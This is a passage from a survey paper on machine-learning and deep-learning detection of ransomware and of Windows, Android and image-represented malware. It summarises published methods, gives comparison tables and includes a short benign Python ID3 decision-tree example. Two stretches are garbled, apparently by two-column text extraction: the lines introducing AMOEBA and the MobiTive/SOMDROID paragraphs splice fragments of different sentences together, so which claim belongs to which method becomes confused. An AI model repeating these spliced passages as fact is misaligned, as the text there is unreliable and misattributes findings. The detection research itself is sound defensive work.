The method in [241] detects crypto-ransomware by applying static analysis to a collection of malicious and benign files. The histogram density of opcodes forms the feature set, and the SMO classifier in WEKA is used, achieving 95% TPR and 0%–5% FPR. UShallNotPass [50] builds its security mechanism on the random numbers that ransomware needs for encryption. Most operating systems provide these as pseudo-random integers. UShallNotPass achieves 94% TPR.

Reinforcement learning (RL) is used for anti-ransomware testing in [242], where a simulation environment with two main components is built. The first component simulates a ransomware attack, and the second detects it. An RL agent is introduced to attack optimally by evading (obfuscating) the detector and then encrypting the user's target files. This helps identify loopholes in anti-ransomware defences so that they can be fixed before a real attack occurs.

In [243], feature identification based on Sequential Pattern Mining is combined with ML-based classification to detect ransomware. The experimental environment is built from activity log samples of 517 Locky, 535 Cerber, and 572 TeslaCrypt ransomware. Sequential Pattern Mining discovers Maximal Frequent Patterns (MFP) across the ransomware families. The J48, Random Forest, Bagging, and MLP algorithms are used for classification, and the method achieves 99% detection accuracy.

An adaptive pre-encryption early detection model for crypto-ransomware is proposed in [244], combining the concepts of pre-encryption detection and crypto-ransomware population drift. It remedies the shortcomings of earlier models through a precise definition of the pre-encryption boundary. Its adaptability keeps its information on attack behaviour up to date, which is useful for identifying polymorphic ransomware.
of IO requests it makes are taken into consideration. Binary DT Ransomware detection framework Autonomous Backup and
with ID3 is utilized for the detection of ransomware. Additionally, Recovery (AMOEBA) is proposed which is based on content [245].
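The binary decision tree with ID3 used for SSD-level detection in [236] grows its tree by choosing, at each node, the feature with the highest information gain. The Python sketch below illustrates only that generic ID3 procedure; it is not the implementation from [236]. The feature names are invented for illustration: `io_type`, `size_class`, and `lba_reuse`, a hypothetical flag for a write that overwrites a block just read. The six labelled IO requests are likewise toy data. Together they loosely stand in for the IO type, request size and block address features mentioned for [236].

```python
import math
from collections import Counter

# Hypothetical toy data (NOT from [236]): discretised features of IO requests.
# lba_reuse is an invented flag: "overwrite" if the write hits a block just read.
train_rows = [
    {"io_type": "write", "size_class": "large", "lba_reuse": "overwrite"},
    {"io_type": "write", "size_class": "small", "lba_reuse": "overwrite"},
    {"io_type": "write", "size_class": "large", "lba_reuse": "new"},
    {"io_type": "read", "size_class": "large", "lba_reuse": "new"},
    {"io_type": "read", "size_class": "small", "lba_reuse": "overwrite"},
    {"io_type": "write", "size_class": "small", "lba_reuse": "new"},
]
train_labels = ["ransomware", "ransomware", "benign", "benign", "benign", "benign"]


def entropy(labels):
    """Shannon entropy (in bits) of a list of class labels."""
    total = len(labels)
    return -sum((n / total) * math.log2(n / total) for n in Counter(labels).values())


def information_gain(rows, labels, attr):
    """Reduction in label entropy obtained by splitting rows on attribute attr."""
    remainder = 0.0
    for value in {row[attr] for row in rows}:
        subset = [lab for row, lab in zip(rows, labels) if row[attr] == value]
        remainder += len(subset) / len(rows) * entropy(subset)
    return entropy(labels) - remainder


def id3(rows, labels, attrs):
    """Grow an ID3 tree as nested dicts: {attr: {value: subtree_or_label}}."""
    if len(set(labels)) == 1:  # pure node -> leaf
        return labels[0]
    if not attrs:  # no attributes left -> majority-class leaf
        return Counter(labels).most_common(1)[0][0]
    best = max(attrs, key=lambda a: information_gain(rows, labels, a))
    tree = {best: {}}
    for value in {row[best] for row in rows}:
        idx = [i for i, row in enumerate(rows) if row[best] == value]
        tree[best][value] = id3(
            [rows[i] for i in idx],
            [labels[i] for i in idx],
            [a for a in attrs if a != best],
        )
    return tree


def classify(tree, row, default="benign"):
    """Follow the tree for one request; unseen values fall back to default."""
    while isinstance(tree, dict):
        attr = next(iter(tree))
        tree = tree[attr].get(row[attr], default)
    return tree


tree = id3(train_rows, train_labels, ["io_type", "size_class", "lba_reuse"])
print(tree)
print(classify(tree, {"io_type": "write", "size_class": "small", "lba_reuse": "overwrite"}))
```

On this toy data, ID3 first splits on `lba_reuse`, because every hypothetical ransomware request overwrites a block, and then on `io_type`. ID3 handles only categorical features, so numeric features such as raw block addresses or request sizes would first have to be discretised, as assumed here.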
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

AMOEBA works at the device level, so no extra backup storage is required. It relies on two main components: a hardware accelerator and a fine-grained backup mechanism. For high-speed ransomware detection, content-based detection algorithms are executed on the hardware accelerators. The fine-grained backup control mechanism reduces the space overhead of data backup. AMOEBA is prototyped on the OpenSSD platform.

The DNAact-Ran method uses ML to perform ransomware detection and classification [246]. DNAact-Ran computes digital DNA sequences with the help of algorithms such as MOGWO and BCS. It also uses digital DNA sequencing design constraints and a k-mer frequency vector. On the basis of this digital genome, the uniqueness of each ransomware sample is identified and the ransomware is classified into well-known families. The method is evaluated with precision, recall, F-measure and accuracy over 582 ransomware instances and 942 goodware instances. It attained 87.9% detection accuracy, better than ML algorithms such as Naïve Bayes, Decision Stump and AdaBoost.

For detecting IoT ransomware attacks, the Intrusion Detection Honeypot (IDH) is developed using the Social Leopard Algorithm (SoLA) [247]. IDH comprises a Honeyfolder, Audit Watch and Complex Event Processing (CEP). The Honeyfolder acts as a trap and early-warning system when suspicious file activity is encountered, and this is where SoLA is used. Audit Watch verifies the entropy of files and folders. Finally, the CEP engine aggregates the data of various security systems and confirms the behaviour and attack pattern of the ransomware. The design is validated with more than 20 ransomware variants. The experimental results are better than those of existing systems in terms of precision, recall and accuracy.

To combat ransomware attacks on smart healthcare, the Blockchain-Enabled Security Framework (BSFR-SH) is proposed [248]. A security analysis of BSFR-SH demonstrates its security against ransomware attacks. BSFR-SH comprises five phases:
- In the first phase, healthcare data backups are generated via blockchain.
- In the second phase, blockchain-based data collection and signature generation are performed.
- In the third phase, ML is applied for ransomware detection and analysis.
- In the fourth and fifth phases, blockchain-based ransomware mitigation and data recovery are implemented, respectively.

Compared with other existing schemes, BSFR-SH provides better accuracy and F1-score.

A multi-feature and multi-classifier network-based system (MFMCNS) is proposed to detect ransomware [249]. WannaCry and NotPetya ransomware are used to provide a complete behavioural analysis of ransomware network traffic. Two sets of 21 related features are extracted at the session and time-flow levels. Each set is processed by an independent classifier that uses the majority voting rule. Detection accuracies of 99.88% and 99.66% are obtained for the session-based and time-based classifiers, respectively.

Based on file-sharing traffic analysis, a security tool for detecting and blocking crypto-ransomware is proposed in [250]. ML techniques monitor the traffic, and traffic patterns related to ransomware activity are identified during file reading and overwriting. Features are extracted from activities that include opening, closing and altering files. More than 70 ransomware binaries from 33 distinct strains are used for training and testing. The false positive rate and information on encrypted files are the parameters used to validate the algorithms.

An ontology-driven framework for digital extortion threats (Rantology), focusing on Windows ransomware attacks, is developed in [251]. The proposed ontology uses API functions and behaviours to evaluate the maliciousness of programs. It facilitates communication between cyber security experts and ransomware knowledge-based systems, and it also identifies sensitive areas for investigation. It is evaluated with several measures: clarity, consistency, modularity, richness and coverage of the inheritance. Table 9 provides a summary of recent ransomware detection techniques.

Table 9
Comparison of recent ransomware detection techniques using ML.
Type of method | Research paper | Features | Algorithms of classification
Behaviour-based | Keshavarzi et al. (2023) [251] | Knowledge-based systems, API functions and behaviours | Ontology driven framework
Behaviour-based | Almashhadani et al. (2022) [249] | WannaCry and NotPetya, majority voting rule | MFMCNS
Behaviour-based | Al-rimy et al. (2018) [224] | Majority voting strategy, OR logic | SVM
Behaviour-based | Gomez-Hernandez et al. (2018) [223] | Honey file trap, zero-day attacks | R-Locker
Behaviour-based | Jung et al. (2018) [226] | Header fields, high entropy | Context-aware entropy analysis
Behaviour-based | Scaife et al. (2016) [219] | Primary & secondary indicators, hash similarities, Shannon entropy | CryptoDrop
Behaviour-based | Kharaz et al. (2016) [222] | File lockers, screen lockers | UNVEIL
IRP monitoring based | Mehnaz et al. (2018) [227] | Trap monitoring, entropy, patterns, profiling | RWGuard
IRP monitoring based | Bottazzi et al. (2018) [229] | IRP | Mini-filter driver
IRP monitoring based | Continella et al. (2016) [228] | Supervised learning | ShieldFS
Network traffic monitoring based | Morato et al. (2018) [230] | Traffic monitoring, file modifications | RedFish
Network traffic monitoring based | Cabaj et al. (2018) [231] | HTTP traffic | SDN based
Network traffic monitoring based | Alhawi et al. (2018) [234] | ML, network traffic, DT | NetConverse
Memory-based | Min et al. (2021) [245] | Device level storage, hardware accelerators | AMOEBA
Memory-based | Baek et al. (2018) [236] | SSDs, NAND flash, FTL | Binary DT with ID3
API calls based | Harikrishnan et al. (2018) [237] | Regularized Least Square, Radial Basis Function | GURLS
Android environment | Ferrante et al. (2018) [238] | Opcode's frequency, memory, network, and CPU | Hybrid method
Android environment | Scalas et al. (2018) [239] | ML, API packs, RF | R-PackDroid
Android environment | Azmoodeh et al. (2018) [204] | Power consumption prototypes | KNN
Others | Berrueta et al. (2022) [250] | Crypto-ransomware, ML, file activities | File sharing traffic analysis
Others | Wazid et al. (2022) [248] | Smart healthcare-based, 5 phases, ML | BSFR-SH
Others | Sibi Chakkaravarthy et al. (2020) [247] | IDH, Honeyfolder, Audit Watch, CEP | SoLA
Others | Khan et al. (2020) [246] | Digital DNA Sequences, MOGWO, BCS | DNAact-Ran
Others | Homayoun et al. (2020) [243] | ML, MFP | Sequential Pattern Mining
Others | Baldwin et al. (2018) [241] | WEKA, histogram density | SMO
Others | Gen et al. (2018) [50] | Random number encryption | UShallNotPass

6. Deep learning based malware detection techniques

6.1. Sandboxing based malware detection

6.1.1. Static analysis based malware detection techniques
The work in [252] accomplishes automatic malware detection using a deep learning approach based on static analysis. It consists of two components: a feature extraction technique and a deep learning model. Grayscale images and OpCode 3-grams are combined to extract malware features, and the resulting feature set is used to train the deep learning model. A deep feedforward neural network is used to classify samples as benign or malware [58].

The Deep Learning Framework for Intelligent Malware Detection (DL4MD) learns from the API calls made by malware [31]. 32-bit API call references are extracted using a database. These features are given as input to the DL4MD architecture, which is based on stacked autoencoders.

In [27], a Convolutional Neural Network classifies binaries on the basis of their disassembled byte code. The raw disassembled code is further processed for feature generation: it is parsed, and X86 instructions of different lengths are extracted as features.

In [253], a deep learning model is implemented with a linear support vector machine as its top layer, so that a margin-based loss is minimized instead of the cross-entropy loss. Replacing SoftMax with L2-SVMs gives better results on well-known deep learning datasets such as MNIST and CIFAR-10. The model produces an error rate of 11.9%, which is better than a CNN with SoftMax. The CNN-BiLSTM model [85] is an entirely data-driven method for feature extraction.

In [77], malicious software is represented as grayscale images. Such images capture subtle changes while preserving the overall structure, which makes differences between samples detectable. The MalImg dataset and the Microsoft Malware Classification Challenge dataset are used as benchmarks to assess the feasibility of the approach.

A file-agnostic deep learning strategy for classifying malware is presented in [78]. It rests on the observation that most malware variants are created with standard obfuscation techniques. Compression and encryption algorithms therefore retain some attributes inherent in the original code. The strategy uses the data supplied by Microsoft for the BigData Innovators Gathering Anti-Malware Prediction Challenge. It enables the discovery of discriminative patterns shared by practically all variants in a family.

A file-independent, end-to-end deep learning method for classifying malware from raw byte sequences, without manually created features, is suggested in [75]. It has two essential parts: a denoising autoencoder that learns a hidden representation of the malware's binary content, and a dilated residual network that serves as the classifier. In the experiments, it classifies malware into families with almost 99% accuracy.

A holistic multi-dimensional deep learning framework for IoT malware classification and family attribution is implemented in [79]. Static features of executable binaries are extracted and used in the form of strings and images. More than 70k IoT malware samples from the four major malware families Mirai, Gafgyt, Tsunami and Dofloo are involved in the analysis. After
performing in-depth experiments, the framework achieves 99.78% accuracy. This IoT-tailored method is used to label fresh “unknown” malware samples. Table 10 provides a summary of recent static analysis based malware detection techniques using DL.

Table 10
Comparison of Static analysis techniques using DL.
Research paper | Features | Type of analysis | Algorithms of classification
Dib et al. (2021) [79] | Static features, strings and image format | Static | Multi-dimensional deep learning framework
Lee et al. (2021) [180] | PHI-UIs and semantic feature | Static | Chameleon-Hunter
Fang et al. (2019) [60] | PE, RL | Static | DQEAF
Gibert et al. (2019) [13] | Mnemonics sequence | Static | Hierarchical CNN
Gibert et al. (2018a) [75] | Byte sequence | Static | Denoising AE with ResNet
Gibert et al. (2018b) [78] | Structural entropy | Static | CNN
Gibert et al. (2018c) [77] | Grayscale image | Static | CNN
Li et al. (2019) [8] | HMM, domain features, two level model | Static | DGA + DNN
Křcal et al. (2018) [35] | Bytes sequence | Static | CNN
Rezende et al. (2018) [36] | Grayscale image | Static | ResNet-50
Gibert et al. (2017) [74] | Mnemonics sequence | Static | Shallow CNN
Kolosnjaji et al. (2017) [52] | PE header features, instruction traces, imported functions and DLL files | Static | CNN with Feedforward NN (Nearest Neighbours)
Liu et al. (2017) [252] | Grayscale images | Static | Opcode 3 gram with CNN
Yin et al. (2017) [88] | Opcodes | Static | RNN + SVM

6.1.2. Dynamic and hybrid analysis based malware detection techniques
Huang and Stokes [38] use API call features. In [32], a Deep Belief Network (DBN) is applied to the log files created by running samples in a sandbox. Similarly, a bidirectional Recurrent Neural Network (RNN) that observes system calls is applied to API call events [28]. The events produced by malware analysers are encoded into 114 high-level events. The RNN, whose function is similar to that of an LSTM, captures the relationships among these events. According to the experimental results, the model's true positive rate is 82% and its false positive rate is 0.5%.

In [33], raw malware byte code is used for malware detection, with a down-sampling step applied before the pre-processing stage. Down-sampling is a generic data scaling approach. After that, a deep learning model can be applied.

Evasion attacks make malware harder to detect when deep learning is used. Grosse et al. [254] investigate the viability of adversarial crafting against deep neural networks. Crafted inputs evade machine learning models and lead to misclassification; on the DREBIN dataset, the misclassification rate rises to 80%. Adversarial crafting is therefore a major security threat. Gradient-based attacks are also possible against deep networks, where changing particular bytes of a malware sample enables the attack. According to Kolosnjaji et al. [52], adversarial malware binaries have a high probability of a successful attack. For a similar problem, a gradient-based method [255] is applied to the classification of malware samples. The MalConv network is used for this
implementation, which achieves a 60% evasion rate. This byte-oriented approach provides better security for the vulnerable environment. Malware detection using deep learning is powerful and efficient, and it greatly reduces the size of the feature set. However, it does not provide resistance to evasion attacks, and the model's performance does not depend on adding hidden layers. More advanced research is needed in deep-learning-based malware detection.

In the dynamic analysis of [256], an LSTM classifier is applied to extracted HTTP traffic for malware classification. Similarly, in [257], network behaviour is analysed with a combination of Autoencoders (AE) and Nearest Neighbour (NN) classifiers. Kumar et al. [258] implemented a malware detection technique that applies both static and dynamic analysis. It extracts the file's metadata, network data, system calls, process, and registry features. MalShare and VirusShare are used as data sources for classification, together with XGBoost, RF, DT, NN, and KNN classifiers. Like Kumar et al., Rhode et al. [259] applied both analysis methodologies. They extracted features such as API calls and classified data from 6809 malware samples using RF, NN, and SVM classifiers.

A deep-learning-based method for detecting Windows malware, combining visualization with convolutional neural network techniques, is put into practice in [260]. The neural network structure is based on the VGG16 network and supports hybrid visualization of malware. Cuckoo Sandbox is used to analyse the samples dynamically. The results of the dynamic analysis are then transformed into RGB colour images by a newly developed static visualization algorithm. To encode additional information from raw files, the approach uses the byte frequency information of PE files and RGB colour pictures, which makes use of all three colour channels. Neural networks are trained on static and hybrid visualization images. The method attained 91.41% accuracy with static visualization and 94.70% with hybrid visualization. Recently proposed dynamic and hybrid malware detection techniques using DL are compared in Table 11.

Table 11
Comparison of recent Dynamic and Hybrid malware detection techniques using DL.
Research paper | Features | Type of analysis | Algorithms of classification
Huang et al. (2021) [260] | Visualization, CNN, VGG16, RGB colour images | Both static and dynamic | Deep Learning based
Vinaykumar et al. (2019) [63] | PE | Both static and dynamic | LSTM+CNN, MLA
Kumar et al. (2019) [258] | System calls, metadata of PE file, network data, process and registry features | Both static and dynamic | RF, XGBoost, DT, NN, K-NN
Rhode et al. (2019) [259] | API calls, machine metrics | Both static and dynamic | NN, RF, SVM
AL-Hawawreh et al. (2018) [257] | Network behaviour | Dynamic | AE with NN
Kolosnjaji et al. (2018) [255] | Byte-oriented approach, gradient-based | Dynamic | MalConv
Raff et al. (2017) [33] | Raw malware byte code, down sampling | – | –
Athiwaratkun et al. (2017) [87] | API call sequence | Dynamic | LSTM, GRU
Prasse et al. (2017) [256] | HTTP traffic | Dynamic | LSTM
Kolosnjaji et al. (2016) [52] | API call sequences | Dynamic | CRNN
Huang et al. (2016) [38] | 4.5 M files training, 2 M testing | Dynamic | MtNet
Grosse et al. (2016) [254] | Adversarial crafting, DREBIN dataset | Dynamic | DNN

6.1.3. Image based malware detection techniques
The work in [28] provides comprehensive representations of malware process behaviours. For each operation's execution, information such as the name, ID, event name, and current directory path is recorded. An RNN is then applied to build a behavioural language model whose outputs are interpreted as images. The features learned by a CNN from these images are finally used to classify each discovered sample as benign or malicious. In a similar vein, Tobiyama et al. [261] produce 2D grayscale images and classify them with a CNN.

Deep learning is well suited to GPU environments, which make models easy to train and malware detection efficient. Consequently, current malware analysis research has shifted from static and dynamic analysis toward deep learning. Use of the Microsoft Malware Classification Challenge dataset (BIG2015) has been the subject of comparative research [262]. That comparison shows that, from 2016 to 2017, the majority of researchers focused on deep learning. Accurate malware identification requires a model with automatic feature extraction.

The YongImage method is employed in a DL-based malware classification model [73]. It embeds malware as image vectors by relating instruction-level information to disassembly metadata produced by the IDA disassembler. The resulting deep neural network, malVecNet, has a simplified design and a high rate of convergence. It is motivated by the strong performance of image-based convolutional neural networks. YongImage turns malware analysis tasks into image classification problems, for which minimal domain knowledge and simple feature extraction methods suffice. malVecNet is optimized with the idea of sentence-level classification from Natural Language Processing [263], which enables effective training. The model is evaluated with 10-fold cross-validation on the Microsoft malware dataset and achieves 99.49% accuracy.

Using the Malimg dataset, a deep learning malware classification model is proposed in [37], in which an SVM classifier is added for classifying malware. Convolutional Neural Networks (CNN), Multilayer Perceptron (MLP), and Gated Recurrent Unit (GRU) are the deep learning models employed for classification. The results show that GRU performs better than the other models, with an accuracy of approximately 84.92%.

A lightweight model for the IoT environment is introduced in [195] to detect distributed denial of service (DDoS) malware. A convolutional neural network is designed to classify malware families using image recognition methods. Grayscale images are created from malware binaries and given as input to the classifiers. If a malicious file is found, it is sent to a remote cloud server for further classification. A signature-matching database is very large because it includes information about every malware sample. It is therefore inefficient for the IoT environment, where device resources are limited. A small two-layer shallow CNN is thus used to build lightweight malware detection, classifying malicious behaviour with 94.0% accuracy.

A malware classification model combining CNN and SVM is proposed in [48]. SVM is used for differentiating
the families of malware. A malware sample and its family are related by the mapping f: n → z, where n denotes a newly arriving malware sample and z denotes its family. The Malimg dataset, with 25 families and 9339 samples, is used for the implementation. This CNN-SVM model obtains 97.5% accuracy.

In [264], mobile apps are represented as grayscale images obtained from mobile binaries. Image-processing-based malware detection techniques still require complex feature extraction methods to detect malware. BIG2015 has recently been used for malware analysis by multiple methods in different experimental environments. VisDroid, an image-based malware detection method, is implemented to detect Android malware and classify Android malware families [265].

An automated vision-based Android Malware Detection (AMD) model is proposed in [266]. It develops 16 distinct fine-tuned, deep-learning-based CNN algorithms to classify benign and malware apps effectively, with minimal computation in the reverse engineering and feature extraction stages. Grey-coloured malware images are generated to achieve accurate prediction on balanced or imbalanced datasets. Before the CNN classification stage, the byte codes of the “classes.dex” files are extracted from the malware and benign apps. They are then transformed into grayscale and colour images. The imbalanced benchmark Leopard Android dataset, composed of 14,733 malware app samples and 2486 benign app samples, is used to evaluate the detection efficiency of the AMD model. Several experimental scenarios are run with balanced and imbalanced Android samples of the Leopard dataset. The model attains 99.40% accuracy on balanced samples and 98.05% on imbalanced samples. Table 12 compares recent image-based malware analysis techniques that use DL.

Table 12
Comparison of recent Image-based malware detection techniques using DL.
Research paper | Features | Type of analysis | Algorithms of classification
Almomani et al. (2022) [266] | 16 CNN algorithms, grey-coloured malware images, Leopard Android dataset | Image-based | An automated vision-based Android Malware Detection
Yuan et al. (2021) [267] | Multidimensional Markov images | Image-based | LCNN
Li et al. (2021) [268] | Binary, assembly and visible string | Image-based | Enhanced CNN
Gurumayum et al. (2020) [48] | Malimg dataset | Image-based | CNN+SVM
Francesco et al. (2020) [264] | Grayscale images | Image-based | CNN
Bakour et al. (2020) [265] | 5 types of image datasets (VisDroid) | Image-based | RNN and Inception3
Yongkang et al. (2019) [73] | malVecNet | Image-based | CNN
Su et al. (2018) [195] | Light-weighted model, IoT environment | Image-based | CNN
Agarap et al. (2017) [37] | Malimg dataset | Image-based | CNN+MLP+GRU
Tobiyama et al. (2016) [261] | 2D grayscale images | Image-based | CNN
Pascanu et al. (2015) [28] | Behavioural language model | Image-based | CNN

6.2. Mobile malware detection

6.2.1. Android malware detection techniques
Android phones lead mobile phone sales worldwide with 71.62% of sales, followed by Apple's iOS with 27.73% [269]. The first version of iOS was introduced in 2007. It is regarded as a revolution in the mobile market because of novel features such as the touch-screen user interface and the virtual keyboard. It elevated Apple to the top of the mobile device market and forced other manufacturers to develop new products and operating systems in response to consumer expectations. Three years after the device's introduction, in 2010, there were 150 apps available in the Apple market, and this figure reached 1.5 million in 2015.

Droid-Sec is a pioneering Android malware classification model that applies deep learning [81]. More than 200 features are extracted through static as well as dynamic analysis. The feature set is then provided as input to a DNN that classifies Android malware. In experiments with 250 malware apps and 250 legitimate apps, it reaches an accuracy of 96.5%.

In [58], binaries of Windows applications are analysed with a DNN. A 1024-bit feature vector is obtained by extracting four distinct sets of static features. A DNN with hidden layers then classifies the malware using these feature vectors. For Android, inter-component communication (ICC) analysis produces data-dependency flow graphs [270]. DroidDetector [271] is a similar method that follows the same procedure as Droid-Sec for classifying Android malware. It constructs a CNN from 192 features obtained by applying static and dynamic analysis.

A malware classification method for the mobile environment based on grayscale images is proposed in [264]. To provide input for the classifiers, grayscale images are obtained after executing all the samples, and features are extracted. The model is tested on a dataset of 50,000 Android samples and 230 Apple samples. Among the Android samples, 24,553 are malicious and 25,447 are genuine, across 71 families. For Apple, 115 samples are distinguished from 10 families.

VisDroid [265] is an Android malware detection scheme that uses an image-oriented analysis approach to classify malware families. Five grayscale image datasets are developed from 4850 Android malware samples. Two kinds of image features are extracted and used to train six distinct ML classifiers: RF, KNN, DT, Bagging, AdaBoost, and GBC. The colour histogram is built from both local and global features, with the local features contributing to robustness. To evaluate the efficiency of the classifiers, a hybridized ensemble voting classification is implemented. The deep learning models RNN and Inception3 are also used to classify malware on these datasets.

MobiTive [272] aims to enhance Android malware detection by leveraging customized neural networks to provide detection in real-time mobile environments. MobiTive detects mobile malware that is either pre-installed or dynamically installed. Though deep learning models are efficient in
server-side malware detection, still there are some limitations SOMDROID, an android malware detection framework by ap-
like computation power, memory size, and energy while deploy- plying an unsupervised ML algorithm ANN is proposed in the
ing in mobile devices directly. To overcome those shortcomings, work [277]. For model development, 5 lakhs different android
the proposed system calculates and examines 5 important factors. apps of 30 distinct categories are collected and 1844 distinct
The performance and accuracy of various feature types with features are extracted. Six various feature ranking methods are
neural networks are evaluated. Using multi-class classification tasks, 70,130 Android malware samples are classified for evaluation.

A hybrid DL-enabled intelligent multi-vector malware detection method is presented in [273]. It combines the salient features of CNN and Bidirectional Long Short-Term Memory (BiLSTM) for effective malware identification. Publicly available state-of-the-art datasets such as AndroZoo and AMD are used to evaluate the detection method, and five distinct feature selection algorithms are employed for effective feature selection. The proposed mechanism outperforms existing hybrid DL-enabled architectures such as DNN-GRU and LSTM-GRU. Evaluated with 10-fold cross-validation, the method attains 99.05% accuracy, 99.39% precision and a 99.41% F1-score.

To classify Android malware families, a multi-stream deep learning network is used [274]. The CNN input is obtained in string format from a few files of each malicious Android app. A one-dimensional convolution filter-based network is applied over the files or sections to classify the malware family, and gradient analysis is used to visualize the most important files and sections. The DREBIN and AMD malware datasets are used to validate the approach. The findings show that the 1D CNN model achieves 93.2% accuracy, which is higher than that of the 2D CNN model.

applied to choose significant features or feature sets. The Self-Organizing Map (SOM) algorithm is applied over the selected features (i.e., permissions, app ratings, number of downloads and API calls) or feature sets, and t-test analysis is used to check the significance of the selected features. According to the results, a detection rate of 98.7% is attained for unknown malware apps in a real-time environment.

MGOPDroid [278] is an Android malware obfuscation-variant detection system based on multi-granularity opcode features. The opcode feature distribution difference index, obtained before and after obfuscation is applied, is combined with the TF-IDF technique to compute opcode feature weights. Using opcode encoding mapping rules, the opcode features are then translated into sequences, and the sequences are turned into grayscale images to visualize the features. A DL model that integrates ResNet with a global average pooling layer is developed to detect malware variants. MGOPDroid can be used on mobile devices and supports automated malware detection, behaviour updates, and real-time monitoring of app installations. Based on the observed results, detection accuracies of 96.35% and 94.55% are attained for obfuscated samples and obfuscated malware, respectively. Recent DL-based Android malware detection techniques are compared in Table 13.
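The weighting and image-construction steps described for MGOPDroid [278] can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the authors' implementation: it uses plain TF-IDF and omits the obfuscation-aware distribution difference index, and the opcode-to-pixel table (`encode_table`), the image `width` and the function names are hypothetical stand-ins for the paper's opcode encoding mapping rules.

```python
import math
from collections import Counter


def tfidf_weights(apps):
    """Return one {opcode: TF-IDF weight} dict per app.

    `apps` is a list of opcode sequences (one list of opcode strings per app).
    Plain TF-IDF only; MGOPDroid's obfuscation difference index is not modelled.
    """
    n_apps = len(apps)
    # Document frequency: number of apps in which each opcode occurs.
    doc_freq = Counter()
    for ops in apps:
        doc_freq.update(set(ops))
    weights = []
    for ops in apps:
        counts = Counter(ops)
        total = len(ops)
        weights.append({
            op: (cnt / total) * math.log(n_apps / doc_freq[op])
            for op, cnt in counts.items()
        })
    return weights


def opcodes_to_grayscale(ops, encode_table, width):
    """Map opcodes to pixel values and fold them into rows of `width` pixels.

    `encode_table` is a hypothetical opcode -> 0..255 mapping; unknown opcodes
    become 0, and the last row is zero-padded so the image is rectangular.
    """
    pixels = [encode_table.get(op, 0) for op in ops]
    pixels.extend([0] * (-len(pixels) % width))
    return [pixels[i:i + width] for i in range(0, len(pixels), width)]


apps = [["move", "invoke", "return"], ["move", "move", "goto"]]
print(tfidf_weights(apps)[0]["move"])  # 0.0: "move" occurs in every app
print(opcodes_to_grayscale(apps[0], {"move": 10, "invoke": 200}, width=2))
# [[10, 200], [0, 0]]
```

Opcodes that appear in every app receive zero weight under plain TF-IDF, which is why a discriminative weighting (in [278], adjusted by the obfuscation difference index) matters before images are built; the fixed width and zero padding are simplifying choices.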
Based on a detailed analysis of the Android permission system, a deep layer clustering technique is applied to identify the permission usage patterns of several groups of Android apps [275]. A large dataset of 16,000 apps with 118 features is built. The aim is to identify and classify permission usage patterns automatically by combining the Self-Organizing Map (SOM) and K-means clustering algorithms. To validate the technique, an SVM classifier is applied to the identified patterns to assess their coherence and generalizability for malware detection. Results show 93.5% accuracy for the model without potential malware and 94.1% accuracy for the model with potential malware.

DroidMalwareDetector [276], a one-dimensional CNN-based Android malware detection framework, is developed for automated feature extraction and selection, 1D data processing with a CNN, and comprehensive permission-based malware analysis using intents and API calls. A de-facto standard dataset of 14,386 apps is used for training and testing. According to the results, DroidMalwareDetector achieved an accuracy of 0.9, which is regarded as high.

Table 13
Comparison of recent Android mobile malware detection techniques using DL.
Research paper | Features | Type of malware | Algorithms of classification
Tang et al. (2022) [278] | Multi-granularity opcode features, TF-IDF algorithm, DL model, ResNet | Android | MGOPDroid
Arvind et al. (2022) [277] | ANN, SOM, t-test analysis | Android | SOMDROID
Talha Kabakus et al. (2022) [276] | 1D CNN, de-facto standard dataset, intents and API calls | Android | DroidMalwareDetector
Namrud et al. (2022) [275] | SOM, K-means clustering, coherence and generalizability | Android | Deep layer clustering technique
Kim et al. (2022) [274] | 1D CNN, gradient analysis, DREBIN and AMD malware datasets | Android | Multi-stream-based deep learning network
Gao et al. (2021) [163] | GCN, heterogeneous graph, App-API and API-API edges | Android | GDroid
Haq et al. (2021) [273] | CNN and BiLSTM, AndroZoo and AMD datasets, DNN-GRU and LSTM-GRU | Android | Hybrid DL-enabled intelligent multi-vector
Feng et al. (2021) [272] | Binary | Android | MobiTive
Francesco et al. (2020) [264] | Grey scale images | Android | DNN
Bakour et al. (2020) [265] | 5 types of image datasets, VisDroid | Android | RNN and Inception3
Yuan et al. (2016) [271] | Static and dynamic | Android | DroidDetector, CNN
Saxe et al. (2015) [58] | Static features | Android | DNN
Wei et al. (2014) [270] | ICC flow graphs | Android | Amandroid
Yuan et al. (2014) [81] | More than 200 features by hybrid analysis | Android | Droid-Sec

6.3. Windows malware detection techniques

In [32], the Cuckoo sandbox is used to trace the runtime behaviour of each malware sample, and every behaviour report is converted into a 20,000-bit vector using unigrams. This bit vector is the input to a DNN that creates signatures, and an SVM classifies the malware using those signatures. In experiments on 1800 malware samples, a classification accuracy of 96.4% is attained.

Hybrid Analysis for Detection of Malware (HADM) [279], a deep learning model, extracts features both statically and dynamically. Static analysis characteristics are extracted as feature vectors, whereas dynamic analysis features are obtained as both feature vectors and graphs. A DNN is trained on the feature vectors, and various graph kernels are applied to the graph-based features. For classification, the resulting kernel matrices are passed to ML classifiers such as SVM. Hierarchical Multiple Kernel Learning (MKL) is thus combined with deep learning, and an accuracy of 94.7% is attained. MKL research work on Windows
malware was carried out before HADM by applying Gaussian and spectral kernels to the features [280].

A CNN-based method for detecting Windows malware is proposed that uses behavioural features of executable files at runtime to both detect and classify unknown malware [281]. The approach is evaluated with 10-fold cross-validation, and the Relief feature selection technique is used to handle the malware executable files effectively. Results show 97.968% accuracy in Windows malware detection.

A deep learning-based malware detection method that combines a visualization technique with a VGG16-based CNN is proposed in [282]. Both static and dynamic analysis approaches are incorporated to visualize malware. Cuckoo Sandbox is used to analyse unknown samples dynamically, and the dynamic analysis results are converted into visualization images by a designed algorithm. The neural network is then trained on these images, and two distinct detection models are constructed and tested, with accuracies of 82.5% and 92.5%.

In [283], multiple dimensionality reduction methods such as PCA and autoencoders are used to derive distinct feature vectors for grouping. Three models, HFVC, OEL and BENN, combine different dimensionality reduction methods and architectures. A public dataset of 138,047 benign and malware samples is used to examine the proposed method, and both the OEL and BENN models achieved F1-scores above 0.9.

